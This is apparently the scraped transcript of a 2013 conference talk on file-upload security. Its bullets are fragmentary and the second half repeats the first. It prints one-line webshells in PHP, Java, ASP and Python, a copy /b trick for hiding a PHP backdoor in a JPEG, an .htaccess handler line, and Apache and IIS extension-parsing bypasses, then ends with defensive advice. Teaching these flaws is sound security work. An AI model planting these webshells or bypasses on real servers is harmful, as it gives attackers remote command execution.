Best Practices - The Upload

2013/01/13 @ WebConf <[email protected]>

• aka Orange • 2009 • 2011, 2012 • 2011
AVTOKYO • 2012 PHP Conf • 2012 VXRLConf • – – Web Security – Windows Vulnerability Exploitation

• CHROOT Security Group • NISRA • Disclosed – MS12-071
/ CVE-2012-4775 • http://blog.orange.tw/

1. Reconnaissance – Google Hacking, Reversed Whois, AXFR …… 2.
Scanning – SYN/ACK Scan, TCP NULL/FIN/Xmas/Mainmon/Window Scan, SCTP INIT Scan, Hydra, Nessus …… 3. Gaining Access – Heap/Stack/V-table Overflow, ROP, Heap Spray, System Misconfiguration, Metasploit, Exploit Database …… 4. Maintaining Access – Privilege Escalation, Trojan, Backdoor, Rootkit, Code/DLL Injection, API Hook, LD_PRELOAD, Anti AV/Debugger …… 5. Clearing Tracks – Syslog, WTMP/UTMP, Event Log, Shell(Bash/Explorer) ……

– Upload? – Web log? Dabase log?

• • – <?php eval( $_REQUEST[cmd] );?> – Runtime.getRuntime().exec( cmd
) – <%eval request("cmd") %> – __import__('os').system(cmd)

https://github.com/evilcos/python-webshell/

http://www.lu-chen.com/

• – PHP CGI PATH_INFO • – /index.php/module/login – /index/module/login
• – /userfiles/mypic.jpg – /userfiles/mypic.jpg/nihao.php

• – Huffman table – EXIF • – copy /b
rst.jpg+backdoor.php dst.jpg • – http://orange.tw/exif.jpg

• • • •

• – – – • – php phtml php3 php4
php5 – asp asa cer cdx shtml – aspx asax ascx ashx asmx http://www.hitcon.org/download/2010/5_Flash Exploit.pdf#Page.20

– AddHandler application/x-httpd-php .jpg • – .php*

https://speakerdeck.com/allenown/the-internet-is-not-safe-webconf-taiwan-2013

https://www.facebook.com/TWWDB

(htaccess ^ ^)

• • – user.jpg  .jpg – user.php.jpg  .jpg
– user.php.xxx  .php – user.php.xxx.ooo  .php

• – IIS < 7 – Asp.net ^__< • –
http://webconf.orange.tw/files/a.asp/user.jpg • – http://webconf.orange.tw/files/user.asp;aa.jpg user.asp;aa.jpg

filename Content-Type File header

• Update your sense and software. • User controlled filename
is always dangerous. – Whatever filename, extension or temporary filename. • Use Image library to valid or strip the image. • Disabled the directory’s execution permission you uploaded to.

• • – htaccess • – Apache – IIS •
•

[email protected]

Best Practices - The Upload

Best Practices - The Upload

Orange

More Decks by Orange

Featured

Transcript

2013/01/13 @ WebConf <[email protected]>

• aka Orange • 2009 • 2011, 2012 • 2011

• CHROOT Security Group • NISRA • Disclosed – MS12-071

1. Reconnaissance – Google Hacking, Reversed Whois, AXFR …… 2.

– Upload? – Web log? Dabase log?

• • – <?php eval( $_REQUEST[cmd] );?> – Runtime.getRuntime().exec( cmd

https://github.com/evilcos/python-webshell/

http://www.lu-chen.com/

• – PHP CGI PATH_INFO • – /index.php/module/login – /index/module/login

• – Huffman table – EXIF • – copy /b

• • • •

• – – – • – php phtml php3 php4

– AddHandler application/x-httpd-php .jpg • – .php*

https://speakerdeck.com/allenown/the-internet-is-not-safe-webconf-taiwan-2013

https://www.facebook.com/TWWDB

(htaccess ^ ^)

• • – user.jpg  .jpg – user.php.jpg  .jpg

• – IIS < 7 – Asp.net ^__< • –

filename Content-Type File header

• Update your sense and software. • User controlled filename

• • – htaccess • – Apache – IIS •

Q & A

[email protected]